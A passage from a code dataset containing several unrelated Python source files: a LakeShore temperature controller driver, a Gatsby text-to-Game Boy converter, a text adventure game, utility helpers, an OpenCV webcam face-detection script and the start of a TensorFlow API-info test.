self._ctrlloop).rstrip().split(',')[1])\n\t\tself._P = float(self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[0])\n\t\tself._I = float(self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[1])\n\t\tself._D = float(self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[2])\n\t\tself._setpoint = float(self.device.query('SETP? ' + self._ctrlloop).rstrip())\n\t\tself._nowtemp = float(self.device.query('KRDG? ' + str(self.channel)).rstrip())\n\t\t#self._nowsrdg = float(self.device.query('SRDG? ' + str(self.channel)).rstrip())\n\t\tself._houtput = float(self.device.query('HTR? ').rstrip())\n\n\n\t@property\n\tdef channel(self):\n\t\tself._channel = self.device.query('CSET? ' + self._ctrlloop).rstrip().split(',')[0]\n\t\treturn self._channel\n\t@channel.setter\n\tdef channel(self, channel):\n\t\tself._channel = str(channel)\n\t\tself.device.write('CSET ' + self._ctrlloop + ',' + str(channel) + ',1,1') #',1,1' means unit=Kelvin and loop=ON respectively\n\t\t\n\t\t\n\t@property\n\tdef sensortype(self):\n\t\tself._sensortype = self.device.query('INTYPE? ' + self._channel).rstrip().split(',')[0]\n\t\treturn self._sensortype\n\t@channel.setter\n\tdef sensortype(self, sensortype):\n\t\tself.device.write('INTYPE ' + self._channel + ',' + str(sensortype))\n\t\t\n\t\t\n\t\t\n\t@property\n\tdef inputcurve(self):\n\t\tself._inputcurve = self.device.query('INCRV? ' + self._channel).rstrip()\n\t\treturn self._inputcurve\n\t@inputcurve.setter\n\tdef inputcurve(self, inputcurve):\n\t\tif int(inputcurve) in [35, 36, 42]:\n\t\t\tif int(inputcurve) in [35, 42]:\n\t\t\t\tself.sensortype = 8\n\t\t\telse:\n\t\t\t\tself.sensortype = 1\n\t\t\tself.device.write('INCRV ' + self._channel + ',' + str(inputcurve))\n\t\t\tself.device.write('CSET ' + self._ctrlloop + ',' + self._channel + ',1,1') #Rewrite CSET to keep unit 'K' and loop on, cause the loop might turn off for unknown reasons\n\t\telse:\n\t\t\traise ValueError(\"Input curve %02d is not in use\" %inputcurve)\n\t\t\t\n\n\t@property\n\tdef incrvMenu(self):\n\t\tif self._channel == 'A':\n\t\t\tself._incrvMenu = ['35 [MAGNO+Amb;Cernox]','36 [DAC;Silicon]']\n\t\telif self._channel == 'B':\n\t\t\tself._incrvMenu = ['42 [MAGNO;Cernox]']\n\t\treturn self._incrvMenu\n\t@incrvMenu.setter\n\tdef incrvMenu(self, newMenu):\n\t\tpass\n\n\n\n\t@property\n\tdef hrange(self):\n\t\tresponse = self.device.query('RANGE?').rstrip()\n\t\thrange = self._hrange_dict[response]\n\t\tself._hrange = hrange\n\t\treturn self._hrange\n\t@hrange.setter\n\tdef hrange(self,hrange):\n\t\tself.device.write('RANGE ' + self._hrange_dict[hrange])\n\t\t\n\t@property\n\tdef rampmode(self):\n\t\trampmode = self.device.query('RAMP? ' + self._ctrlloop).rstrip().split(',')[0]\n\t\tself._rampmode = int(rampmode)\n\t\treturn self._rampmode\n\t@rampmode.setter\n\tdef rampmode(self, rampmode):\n\t\tif rampmode == '1':\n\t\t\tself.device.write('RAMP '+ self._ctrlloop + ',' + str(rampmode) + ',' + str(self.ramprate))\n\t\telse:\n\t\t\tself.device.write('RAMP '+ self._ctrlloop + ',' + str(rampmode))\n\n\t@property\n\tdef ramprate(self):\n\t\tramprate = self.device.query('RAMP? ' + self._ctrlloop).rstrip().split(',')[1]\n\t\tself._ramprate = float(ramprate)\n\t\treturn self._ramprate\n\t@ramprate.setter\n\tdef ramprate(self, ramprate):\n\t\tif float(self.rampmode) != 0:\n\t\t\tself.device.write('RAMP '+ self._ctrlloop + ',' + str(self.rampmode) + ',' + str(ramprate))\n\t\telif float(self.rampmode) == 0:\n\t\t\tself.device.write('RAMP '+ self._ctrlloop + ',' + str(self.rampmode))\n\n\t@property\n\tdef P(self):\n\t\tP = self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[0]\n\t\tself._P = float(P)\n\t\treturn self._P\n\t@P.setter\n\tdef P(self,P):\n\t\tself.device.write('PID ' + self._ctrlloop + ',' + str(P) + ',' + str(self.I) + ',' + str(self.D))\n\n\t@property\n\tdef I(self):\n\t\tI = self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[1]\n\t\tself._I = float(I)\n\t\treturn self._I\n\t@I.setter\n\tdef I(self,I):\n\t\tself.device.write('PID ' + self._ctrlloop + ',' + str(self.P) + ',' + str(I) + ',' + str(self.D))\n\n\t@property\n\tdef D(self):\n\t\tD = self.device.query('PID? ' + self._ctrlloop).rstrip().split(',')[2]\n\t\tself._D = float(D)\n\t\treturn self._D\n\t@D.setter\n\tdef D(self,D):\n\t\tself.device.write('PID ' + self._ctrlloop + ',' + str(self.P) + ',' + str(self.I) + ',' + str(D))\n\n\t@property\n\tdef setpoint(self):\n\t\tresponse = self.device.query('SETP? ' + self._ctrlloop).rstrip()\n\t\tself._setpoint = float(response)\n\t\treturn self._setpoint\n\t@setpoint.setter\n\tdef setpoint(self, setpoint):\n\t\tself.device.write('SETP ' + self._ctrlloop + ',' + str(setpoint))\n\t\t\n\t@property\n\tdef nowtemp(self):\n\t\tresponse = self.device.query('KRDG? ' + str(self.channel)).rstrip()\n\t\tself._nowtemp = float(response)\n\t\treturn self._nowtemp\n\t\t\n\t@property\n\tdef nowsrdg(self):\n\t\tresponse = self.device.query('srdg? ' + str(self.channel)).rstrip()\n\t\tself._srdg = float(response)\n\t\treturn self._srdg\n\n\t@property\n\tdef houtput(self):\n\t\tresponse = self.device.query('HTR? ' + str(self.channel)).rstrip()\n\t\tself._houtput = float(response)\n\t\treturn self._houtput\n\t\t\n\t\t\n\t\t\n\t\t\n\tdef configCurve(self,curveDataFile,curveNo):\n\t\tdf = np.loadtxt(curveDataFile,skiprows=2)\n\t\tfor i in range(len(df)):\n\t\t\tcmd = 'CRVPT ' + str(curveNo) + ',' + str(i+1) + ',' + str(round(df[i][1],4)) + ',' + str(round(df[i][0],4))\n\t\t\tprint(cmd)\n\t\t\tself.device.query(cmd)\n\t\treturn\n\n\n\n \n\nif __name__ == \"__main__\":\n\n\trm = ResourceManage.rm_initiate()\n\tidn_dict = ResourceManage.rm_dict()\n\tprint(idn_dict)\n\tLS = LSall(rm,idn_dict)\n\n\n\t#print(LS.channel)\n\t#LS.inputcurve = 36\n\t#print(LS.device.write('INCRV 36,A'))\n\t#print(LS.device.query('INTYPE? A').rstrip())\n\tprint(LS.device.query('CSET? 1').rstrip())\n\t#print(LS.inputcurve)\n\t#print(LS.incrvMenu)\n\t\n\t#LS.setpoint = '300'\n\n\t#print(LS.device.query('CRVDEL 42'))\n\t#print(LS.device.query('CRVHDR? 42'))\n\t#print(LS.device.query('CRVHDR 42,Cernox,X-142027,3,310.0,1'))\n\t#print(LS.device.query('CRVHDR? 42'))\n\n\n\n\t#### Load temperature curve calibrated data points\n\n\t#curveDataFile = r\"\\\\S4\\Datenpool\\Yuk Tai\\Python\\Cenox calibration curve\\X142027\\X142027.dat\"\n\t#LS.configCurve(curveDataFile,42)\n\t#curveDataFile = r\"\\\\S4\\Datenpool\\Dielectric group\\Temperature sensor calibration curves\\Cenox calibration curve\\Cernox_Default_NotStandard.dat\"\n\t#LS.configCurve(curveDataFile,43) \n\t\t\n\n\t\t\n\t#print(LS.device.query('CRVHDR? 43'))\n\t#print(LS.device.query('CRVHDR 43, Cernox, Default, 3, 500, 1'))\n\t#print(LS.device.query('CRVHDR? 43'))\n","repo_name":"tairrchan/Novocontrol-Lakeshore-Controller","sub_path":"LakeShore340Init.py","file_name":"LakeShore340Init.py","file_ext":"py","file_size_in_byte":7224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27066048670","text":"import os\nimport io\n\nWIDTH = 20\nHEIGHT = 18\n\nfile = 1\npage = 0\nf_name = \"gatsby_\" + str(file)\ncharacter_pointer = 0\navailable_height = HEIGHT\nfilepath = \"res/\"\n\ndef seek_size(current):\n pos = current.tell()\n current.seek(0, io.SEEK_END)\n size = current.tell()\n current.seek(pos) # back to where we were\n return size\n\ndef initialize_cfile(current, f_name):\n current.write(\"#include \\n\")\n current.write(\"#pragma bank 255\\n\")\n current.write(\"BANKREF(\" + f_name + \")\\n\")\n\ndef start_page():\n global page\n global f_name\n page = page + 1\n current.write(\"const unsigned char \" + f_name + \"_\" + str(page) + \"[] = {\\n\")\n global character_pointer\n global available_height\n character_pointer = 0\n available_height = HEIGHT - 1\n return\n\ndef end_page():\n current.write(\"};\\n\\n\")\n return\n\ndef end_line():\n global character_pointer\n global available_height\n global file\n global current\n global f_name\n #fill the rest of the width with empty chars\n available_width = WIDTH-character_pointer\n for i in range(available_width):\n place_character(\" \")\n current.write(\"\\n\")\n character_pointer = 0\n if(available_height == 0):\n #go to next page\n end_page()\n if(seek_size(current) > 14336):\n current.close()\n #exit()\n #start next c file\n file += 1\n #if file == 4:\n # exit()\n f_name = \"gatsby_\" + str(file)\n current = open(filepath + f_name + \".c\", \"a\", encoding=\"utf8\")\n initialize_cfile(current, f_name)\n start_page()\n else:\n available_height = available_height - 1\n\ndef write_next_line(line):\n if(line == \"\\n\"):\n #finish current line and write an empty one\n end_line()\n end_line()\n return\n words = line.split()\n global character_pointer\n global available_height\n for word in words:\n #need to go for next line\n available_width = WIDTH-character_pointer\n if(len(word) > WIDTH-character_pointer):\n end_line()\n \n #word fits, put it in\n for char in word:\n place_character(char)\n available_width = WIDTH-character_pointer\n if(available_width > 0):\n place_character(' ')\n\ndef place_character(ch):\n ### special characters\n if(ch == '“' or ch == '”'):\n ch = '\"'\n if(ch == '’'):\n ch = '\\''\n if(ch == '—'):\n ch = '-'\n if(ord(ch) > 255):\n ch = '?'\n ###\n ch_tile_val = hex(ord(ch) - 32)\n global character_pointer\n if(available_height == 0 and character_pointer == WIDTH-1):\n current.write(str(ch_tile_val))\n else:\n current.write(str(ch_tile_val) + \", \")\n character_pointer += 1\n\n#### MAIN ####\n# delete existing c files first\nfile_exists = True\niterator = 1\nwhile(file_exists):\n searched_file = \"gatsby_\" + str(iterator)\n if os.path.exists(filepath + searched_file + \".c\"):\n os.remove(filepath + searched_file + \".c\")\n iterator += 1\n else:\n file_exists = False\n# delete the header\nif os.path.exists(filepath + \"gatsby.h\"):\n os.remove(filepath + \"gatsby.h\")\n\n\nwith open('gatsby.txt', encoding=\"utf8\") as gatsby:\n current = open(filepath + f_name + \".c\", \"a\", encoding=\"utf8\")\n #header = open(filepath + \"gatsby.h\", \"a\", encoding=\"utf8\")\n initialize_cfile(current, f_name)\n start_page()\n for line in gatsby:\n if(line.find(\"------------------------------------------------------------------------\") != -1):\n #end_page()\n #current.close()\n #exit()\n #fill rest of the page with empty char\n while(available_height != 0):\n end_line()\n write_next_line(line)\n while(available_height != 0):\n end_line()\n end_page()\n current.close()\n\n","repo_name":"antonovtum/The_Great_Gatsby_gb","sub_path":"decomp.py","file_name":"decomp.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27586396980","text":"# Adventure Game project designed for Maryville University\n# SWDV 600: Intro to Programming\n\n# Running this file produces and runs an Adventure Game instance\n\nfrom os import system, name as os_name\nfrom random import random, randrange\nfrom player import Player\nfrom enemies import Crab, Philosopher, ExistentialCrisis, BoltzmannBrain\n\nclass AdventureGame:\n 'AdventureGame().run() produces and runs an instance of the game'\n\n def __init__(self):\n \"\"\"\n Produces an Adventure Game instance that tracks moves left, \n whether the game is over, whether the treasure was found, \n a list of possible encounters, the current enemy, and the player\n e.g. AdventureGame()\n \"\"\"\n self.moves = 10\n self.game_over = False\n self.treasure_found = False\n self.possible_encounters = [\n 'Pages', 'Crab', 'Philosopher', 'Existential', 'Boltzmann'\n ]\n self.current_enemy = None\n self.player = None\n\n def get_moves(self):\n \"Returns the number of moves left\"\n return self.moves\n\n def is_game_over(self):\n \"Returns whether the game is over\"\n return self.game_over\n \n def was_treasure_found(self):\n \"Returns whether the treasure was found\"\n return self.treasure_found\n\n def get_encounters(self):\n \"Returns a copy of the list of possible encounters\"\n return self.possible_encounters[:]\n\n def get_enemy(self):\n \"Returns the current enemy\"\n return self.current_enemy\n\n def get_player(self):\n \"Returns the player instance\"\n return self.player\n\n def decrement_moves(self):\n \"Decreases the remaining moves by 1\"\n self.moves -= 1\n\n def end_game(self):\n \"Sets the game over variable to true\"\n self.game_over = True\n\n def is_battle_over(self):\n \"Returns whether the current battle is over\"\n return not (self.get_enemy().get_energy() > 0 and self.get_player().get_energy() > 0)\n\n def set_up_player(self):\n \"Sets up the player instance for a game\"\n while True:\n name = input('\\nWhat is your name ( to submit)? ')\n\n # Validates name length\n if len(name) == 0:\n print('You didn\\'t enter anything! :)')\n elif len(name) > 35:\n print('That\\'s a really long name! Please enter something shorter. :)')\n else:\n break\n\n self.player = Player(name)\n\n def set_up_enemy(self, type):\n \"Sets up current enemy based on type\"\n if type == 'Crab':\n self.current_enemy = Crab()\n elif type == 'Philosopher':\n self.current_enemy = Philosopher()\n elif type == 'Existential':\n self.current_enemy = ExistentialCrisis()\n else:\n self.current_enemy = BoltzmannBrain()\n\n # Adds enemy to player encounter tracking\n self.get_player().add_encounter(self.get_enemy().get_name())\n\n def get_random_choice(self):\n \"Returns a random encounter choice based on probability\"\n rand_val = random()\n\n # Gets index of encounter choice\n if rand_val < 0.35:\n choice = 0\n elif rand_val < 0.55:\n choice = 1\n elif rand_val < 0.75:\n choice = 2\n elif rand_val < 0.95:\n choice = 3\n else:\n choice = 4\n\n return self.get_encounters()[choice]\n\n def get_attack_choice(self):\n \"Gets attack choice from user\"\n enemy_name = self.current_enemy.get_name().lower()\n if enemy_name[0] == 'b': \n enemy_name = enemy_name.capitalize()\n\n while True:\n choice = input(f'What do you do about the {enemy_name} (\"h\" for help)? ')\n\n if len(choice) > 0:\n choice = choice[0].lower()\n\n # Validates choice\n if choice in ['a', 'd', 'r', 'q']:\n break\n elif choice == 'h':\n self.print_attack_help(True)\n\n return choice\n\n def print_header(self):\n \"Prints header for a game instance\"\n print('\\n' + ('-'*29))\n print('Welcome to my Adventure Game!')\n print('-'*29)\n\n def print_help(self, additional=False):\n \"\"\"\n Prints help for main game loop\n Uses additional parameter for printing more info when \"h\" is pressed\n \"\"\"\n if additional:\n print('\\nWhen you take a move, there is a chance of encountering enemies')\n print('and possibly finding other interesting things.')\n print('If attacked, try not to let your energy get too low.\\n')\n\n print('Press \"w\" to start walking, \"s\" to check your status, \"l\" to look behind you, or \"q\" to quit')\n\n def print_attack_help(self, additional=False):\n \"\"\"\n Prints help for battles\n Uses additional parameter for printing more info when \"h\" is pressed\n \"\"\"\n if additional:\n print('\\nTry different options on enemies to figure out the best response!')\n print('\"q\" still ends the game when in a battle.\\n')\n\n print('Press \"a\" to attack, \"d\" to debate, or \"r\" to reassure')\n\n def print_intro(self):\n \"Prints intro for game instance\"\n print(f'Hello Captain {self.get_player().get_name()}!')\n\n print('\\nYou are on the beach of an uninhabited island searching for treasure.')\n print('You are not searching for just any treasure, this treasure is')\n print('rumored to contain the answers to one of life\\'s greatest mysteries.')\n print('This treasure is rumored to contain answers pertaining to the meaning of life,')\n print('as well as lots of gold!')\n\n self.clear_terminal(True)\n\n def print_battle_status(self, new_line=True):\n \"Prints the current status of a battle\"\n p = self.get_player()\n e = self.get_enemy()\n\n if new_line: print()\n status = f'Captain {p.get_name()}: {p.get_energy()} energy | {e.get_name()}: {e.get_energy()} energy'\n print(status)\n print('-'*len(status))\n\n def clear_terminal(self, wait=False):\n \"\"\"\n Clears the terminal screen\n Uses the wait parameter to determine whether to first prompt user for input\n \"\"\"\n if wait: input('\\nPress to continue. ')\n\n if os_name == 'nt':\n # Windows\n system('cls')\n else:\n # Linux or Mac\n system('clear')\n\n # Prints extra line\n print()\n\n # NOTE: This function does not clear in certain shell environments\n # This function should work properly when run in a terminal!\n\n def handle_player_defeat(self):\n \"Handles player energy hitting zero during a battle\"\n self.get_player().handle_defeat()\n\n # Handles player revive\n if self.get_player().get_energy() > 0:\n self.clear_terminal()\n self.print_battle_status(False)\n\n def handle_step(self):\n \"Handles the step between moves, in which encounters are generated\"\n print('\\nYou begin walking forward.')\n\n encounter = self.get_random_choice()\n player = self.get_player()\n\n if encounter == 'Pages':\n # Handles player finding between 1 and 8 pages\n num_pages = randrange(1, 9)\n player.add_trinket(num_pages)\n\n if num_pages == 1:\n print('\\nYou find a page.')\n else:\n print(f'\\nYou find {num_pages} pages.')\n else:\n # Handles enemy encounters / battles\n self.set_up_enemy(encounter)\n enemy = self.get_enemy()\n enemy.print_intro()\n self.clear_terminal(True)\n\n # Battle loop\n self.print_battle_status(False)\n while not self.is_battle_over():\n self.print_attack_help()\n choice = self.get_attack_choice()\n if choice == 'q': self.end_game(); break\n self.clear_terminal()\n\n player.attack_enemy(enemy, choice)\n if enemy.get_energy() > 0:\n enemy.attack_player(player)\n\n self.print_battle_status()\n if player.get_energy() <= 0:\n self.handle_player_defeat()\n\n if player.get_energy() > 0:\n enemy.print_outro()\n else:\n self.end_game()\n\n # Clears current enemy\n self.current_enemy = None\n\n def handle_move(self):\n \"Handles a move in the main game loop\"\n if self.get_moves() > 1:\n print(f'According to your map, you are {self.get_moves()} moves away from the treasure.')\n else:\n print('According to your map, you are only 1 move away from the treasure!')\n\n # Increase player energy by 25 when halfway through\n if self.get_moves() == 5 and self.get_player().get_energy() < 100:\n print('The thought of making it halfway to the treasure causes you to regain some energy!')\n self.get_player().add_energy(25)\n\n self.print_help()\n while True:\n # Gets player choice and handles error caused by input of zero length\n try:\n choice = input('What do you do (\"h\" for help)? ')[0].lower()\n except:\n choice = ''\n\n # Handles player choice \n if choice == 's':\n self.get_player().print_status()\n elif choice == 'l':\n self.get_player().look_behind(self.get_moves())\n elif choice == 'h':\n self.print_help(True)\n\n # Breaks out of loop if \"w\" or \"q\" are selected\n if choice in ['w','q']: break\n\n if choice == 'w':\n self.handle_step()\n else:\n self.end_game()\n\n # Clears terminal between moves, waits for input if game is NOT over\n self.clear_terminal(not self.is_game_over())\n\n def handle_treasure(self):\n \"Handles player finding of treasure at end of game\"\n print('You find a rock with an engraving of an \"X\".')\n input('This must be the spot! Press to continue. ')\n\n input('\\nYou pull out your trusty shovel. Press to dig. ')\n input('You start digging. Press to dig. ')\n input('You hit the top of something with your shovel. Press to dig. ')\n print('You uncover a treasure chest and pull it out of the hole.')\n input('Press to open the chest. ')\n\n print('\\nYou break a lock and open the chest!')\n print('Within is lots of gold coins...')\n print('However, you don\\'t see anything related to the meaning of life.')\n input('Press to investigate further. ')\n\n print('\\nYou reach into the sea of gold coins and pull out a scroll!')\n input('Press to open the scroll. ')\n\n print('\\nYou awaken in your bed, realizing that it was just a dream.')\n self.treasure_found = True\n self.clear_terminal(True)\n\n def handle_game_over(self):\n \"Prints end of game stats\"\n if self.was_treasure_found():\n self.get_player().print_end_stats(True)\n else:\n self.get_player().print_end_stats(False)\n\n print('\\nGAME OVER!\\n')\n\n def run(self):\n \"Runs an instance of the Adventure Game\"\n self.print_header()\n self.set_up_player()\n self.print_intro()\n\n while not self.is_game_over():\n if self.get_moves() >= 1:\n self.handle_move()\n self.decrement_moves()\n else:\n self.handle_treasure()\n self.end_game()\n\n self.handle_game_over()\n\n# Produces an Adventure Game instance and calls its run method\nif __name__ == '__main__': AdventureGame().run()\n","repo_name":"bwilkins96/Python_Adventure_Game","sub_path":"adventure_game.py","file_name":"adventure_game.py","file_ext":"py","file_size_in_byte":11936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10301984732","text":"import importlib\n\n\ndef get_nested_attr(obj, attr_path, skip=0):\n if isinstance(attr_path, str):\n attr_path = attr_path.split('.')\n for attr in attr_path[skip:]:\n obj = getattr(obj, attr)\n return obj\n\n\ndef get_import_path(obj):\n return '{}:{}'.format(obj.__module__, obj.__qualname__)\n\n\nclass UndefinedAttr:\n def __get__(self, instance, owner):\n raise NotImplementedError(\"Attribute not defined\")\n\n\ndef load_by_import_path(import_path):\n module_name, attr_path = import_path.split(':')\n obj = importlib.import_module(module_name)\n for attr in attr_path.split('.'):\n obj = getattr(obj, attr)\n return obj\n\n\ndef is_collection(obj):\n if isinstance(obj, str):\n return False\n try:\n iter(obj)\n except (TypeError, ValueError):\n return False\n else:\n return True\n\n\ndef iflatten(*args):\n \"\"\"\n Arguments may be nested collections - then they will be flattened.\n Also arguments may be not iterable at all - then they simply yielded.\n Examples:\n flatten([1, [2, 3, [4]], 5]) -> [1, 2, 3, 4, 5]\n flatten([1], 2, 3, [[4, 5]]) -> [1, 2, 3, 4, 5]\n :param args: objects, iterable or not\n :return: generator that yields non-iterable objects\n \"\"\"\n for arg in args:\n if is_collection(arg):\n yield from iflatten(*arg)\n else:\n yield arg\n\n\ndef flatten(*iterables):\n return list(iflatten(*iterables))\n\n\ndef iflatten_values(*args):\n for arg in args:\n if is_collection(arg):\n if isinstance(arg, dict):\n arg = arg.values()\n yield from iflatten_values(*arg)\n else:\n yield arg\n\n\ndef unstack(array, axis):\n if axis < 0:\n axis += array.ndim\n slice_start = (np.s_[:],) * axis\n return [array[slice_start+(i, ...)] for i in range(array.shape[axis])]\n\n\ndef flatten_values(*iterables):\n return list(iflatten_values(*iterables))\n\n\ndef fmap(function, *iterables):\n return list(map(function, *iterables))\n\n\ndef tilestr(*strings, gap=' ', gap_width=1, tostr=str):\n \"\"\"\n Build string for printing objects in two or more columns.\n Handles objects whose string representation contains many lines.\n\n Example usage:\n >>> x = np.zeros((3, 4))\n >>> y = np.ones((4, 3))\n >>> print(tilestr(x, y))\n [[ 0. 0. 0. 0.] [[ 1. 1. 1.]\n [ 0. 0. 0. 0.] [ 1. 1. 1.]\n [ 0. 0. 0. 0.]] [ 1. 1. 1.]\n [ 1. 1. 1.]]\n \"\"\"\n line_lists = fmap(str.splitlines, map(tostr, strings))\n\n # normalization: same width within lines list, same length of list\n n_max_lines = max(map(len, line_lists))\n for lines in line_lists:\n list_width = max(map(len, lines))\n for i, line in enumerate(lines):\n lines[i] += ' '*(list_width - len(line))\n lines.extend([' '*list_width]*(n_max_lines - len(lines)))\n\n gap *= gap_width\n tiled_lines = map(gap.join, zip(*line_lists))\n return '\\n'.join(tiled_lines)\n","repo_name":"nanfengpo/tictactoe_nn","sub_path":"tictactoe_nn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21052537452","text":"def check(num):\n return num > 0 and (num & (num - 1) == 0)\n\n\ndef solve_one():\n input()\n arr = list(map(int, input().split()))\n for i in range(32):\n ans = 0xffffffff\n for e in arr:\n if e & (1 << i) != 0:\n ans = ans & e\n if check(ans) is True:\n print(\"YES\")\n return\n print(\"NO\")\n\n\ndef solver():\n T = int(input())\n for _ in range(T):\n solve_one()\n\n\nsolver()\n","repo_name":"ThinhNgVhust/BigO_Algorithms","sub_path":"Orange/W2_BitManipulation/6_Power of Two.py","file_name":"6_Power of Two.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20110486173","text":"import cv2\n# Esta línea de código inicializa el objeto `CascadeClassifier` `face_cascade` con el archivo XML\n# `haarcascade_frontalface_default.xml`. Este archivo XML contiene el modelo previamente entrenado\n# para detectar caras frontales utilizando el algoritmo de clasificadores en cascada basado en\n# características de Haar.\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_default.xml')\n\n# Initialize the webcam\n# `video = cv2.VideoCapture(0)` inicializa la cámara web para capturar fotogramas de vídeo. El\n# argumento `0` especifica el índice de la cámara que se utilizará. En este caso, \"0\" se refiere a la\n# cámara predeterminada, que suele ser la cámara web integrada en la mayoría de los sistemas.\nvideo = cv2.VideoCapture(0) # Use index 0 for the default camera (usually the built-in webcam)\n\nwhile True:\n # Read a frame from the webcam\n ret, frame = video.read()\n if not ret:\n break\n\n # Increase the contrast and brightness of the frame (adjust these values as needed)\n alpha = 1.5 # Contrast control\n beta = 50 # Brightness control\n frame = cv2.convertScaleAbs(frame, alpha=alpha, beta=beta)\n\n # Convert the frame to grayscale for face detection\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Detect faces in the grayscale frame\n faces = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30))\n\n # Draw rectangles around the detected faces\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n # Display the frame with face detection\n cv2.imshow('Face Detection', frame)\n\n # Exit the loop when the 'q' key is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release the webcam and close the OpenCV window\nvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"Diego-Osorio/wifi","sub_path":"detectMov.py","file_name":"detectMov.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4002817184","text":"from absl.testing import parameterized\n\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.framework import _pywrap_python_api_info\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import test_util\nfrom tensorflow.python.platform import googletest\n\n# pylint: disable=g-long-lambda\n\n\n# Helper function to make expected output in examples more compact:\ndef Const(x):\n return constant_op.constant(x)\n\n\n@test_util.run_all_in_graph_and_eager_modes\nclass PythonAPIInfoTest(test_util.TensorFlowTestCase, parameterized.TestCase):\n\n def setUp(self):\n context.ensure_initialized()\n super(PythonAPIInfoTest, self).setUp()\n\n def makeConverterForGenOp(self, op_name):\n \"\"\"Returns a PythonAPIInfo for the given gen_op.\"\"\"\n api_info = _pywrap_python_api_info.PythonAPIInfo(op_name)\n api_info.InitializeFromRegisteredOp(op_name)\n return api_info\n\n def makeConverterFromParamSpecs(self,\n api_name,\n param_names,\n input_specs,\n attr_specs,\n defaults=()):\n \"\"\"Returns a PythonAPIInfo built from the given specs.\"\"\"\n api_info = _pywrap_python_api_info.PythonAPIInfo(api_name)\n api_info.InitializeFromParamSpecs(input_specs, attr_specs, param_names,\n defaults)\n return api_info\n\n # This test initializes a PythonAPIInfo from a registered\n # op, and then uses DebugInfo() to check that the internal state is\n # correct.\n @parameterized.named_parameters([\n # An op whose inputs have fixed dtypes.\n (\"RegexFullMatch\", \"RegexFullMatch\", \"DebugInfo for RegexFullMatch:\\n\"\n \" param_names=[input, pattern, name]\\n\"\n \" defaults_tuple=('RegexFullMatch',)\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=input, is_list=0},\\n\"\n \" {index=1, name=pattern, is_list=0},]\\n\"\n \" inputs_with_fixed_dtype=[\\n\"\n \" {index=0, dtype=DT_STRING, is_list=0},\\n\"\n \" {index=1, dtype=DT_STRING, is_list=0},]\\n\"),\n # An op whose input has a variable dtype.\n (\"Abs\", \"Abs\", \"DebugInfo for Abs:\\n\"\n \" param_names=[x, name]\\n\"\n \" defaults_tuple=('Abs',)\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=T, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=x, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=T, tensor_params=[0], ok_dtypes=[DT_BFLOAT16, DT_HALF, \"\n \"DT_FLOAT, DT_DOUBLE, DT_INT8, DT_INT16, DT_INT32, DT_INT64]},]\\n\"\n \" inferred_type_attrs=[T]\\n\"),\n # An op with two inputs that have the same (variable) dtype.\n (\"AddV2\", \"AddV2\", \"DebugInfo for AddV2:\\n\"\n \" param_names=[x, y, name]\\n\"\n \" defaults_tuple=('AddV2',)\\n\"\n \" attributes=[\\n\"\n \" {inferred_index=0, name=T, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=x, is_list=0},\\n\"\n \" {index=1, name=y, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=T, tensor_params=[0, 1], ok_dtypes=[DT_BFLOAT16, \"\n \"DT_HALF, DT_FLOAT, DT_DOUBLE, DT_UINT8, DT_UINT16, DT_UINT32, \"\n \"DT_UINT64, DT_INT8, DT_INT16, \"\n \"DT_INT32, DT_INT64, DT_COMPLEX64, DT_COMPLEX128]},]\\n\"\n \" inferred_type_attrs=[T]\\n\"),\n # An op with an int attribute.\n (\"GatherV2\", \"GatherV2\", \"DebugInfo for GatherV2:\\n\"\n \" param_names=[params, indices, axis, batch_dims, name]\\n\"\n \" defaults_tuple=(0, 'GatherV2')\\n\"\n \" attributes=[\\n\"\n \" {index=3, name=batch_dims, type=int},\\n\"\n \" {inferred_index=0, name=Tparams, type=type},\\n\"\n \" {inferred_index=1, name=Tindices, type=type},\\n\"\n \" {inferred_index=2, name=Taxis, type=type},]\\n\"\n \" inputs=[\\n\"\n \" {index=0, name=params, is_list=0},\\n\"\n \" {index=1, name=indices, is_list=0},\\n\"\n \" {index=2, name=axis, is_list=0},]\\n\"\n \" inputs_with_type_attr=[\\n\"\n \" {type_attr=Tparams, tensor_params=[0]},\\n\"\n \" {type_attr=Tindices, tensor_params=[1], \"\n \"ok_dtypes=[DT_INT16, DT_INT32, DT_INT64]},\\n\"\n \" {type_attr=Taxis, tensor_params=[2], \"\n \"ok_dtypes=[DT_INT32, DT_INT64]},]\\n\"\n \" inferred_type_attrs=[Tparams, Tindices, Taxis]\\n\"),\n # An op with default attrib values.\n (\"ReduceJoin\", \"ReduceJoin\", \"DebugInfo for ReduceJoin:\\n\"\n \" param_names=[inputs, 